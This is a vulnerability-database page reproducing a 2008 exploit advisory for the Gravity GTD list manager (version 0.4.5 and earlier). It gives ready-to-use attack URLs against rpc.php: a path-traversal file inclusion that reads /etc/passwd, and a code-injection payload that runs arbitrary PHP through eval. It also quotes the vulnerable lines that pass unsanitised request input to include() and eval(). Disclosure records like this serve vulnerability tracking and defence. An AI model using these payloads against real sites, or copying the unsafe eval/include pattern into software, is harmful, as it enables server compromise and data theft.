https://cxsecurity.com/issue/WLB-2009010199
Gravity GTD <= 0.4.5 (rpc.php objectname) LFI/RCE Vulnerability






漏洞ID | 1052254 | 漏洞类型 | |
发布时间 | 2009-01-26 | 更新时间 | 2009-01-26 |
![]() |
CVE-2008-5962
CVE-2008-5963 |
![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
#####################################################
# [ gravity-gtd <= 0.4.5 ] LFI/RCE Vulnerability #
#####################################################
#
# Script: An open source list manager for tracking action items according to the principles of Getting Things Done (GTD).
#
# Download: http://sourceforge.net/projects/gravity-gtd/
#
# [LFI] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=/../../../../../../../../etc/passwd%00
# [RCE] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=Xmenu();phpinfo();die
#
# Bug: ./gravity-0.4.5/library/setup/rpc.php (lines: 15-20)
#
# ...
# $objectName = $_REQUEST['objectname'];
#
#
# include ("../objects/class.".strtolower($objectName).".php"); // LFI
#
# eval ('$instance = new '.$objectName.'();'); // RCE
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
检索漏洞
开始时间
结束时间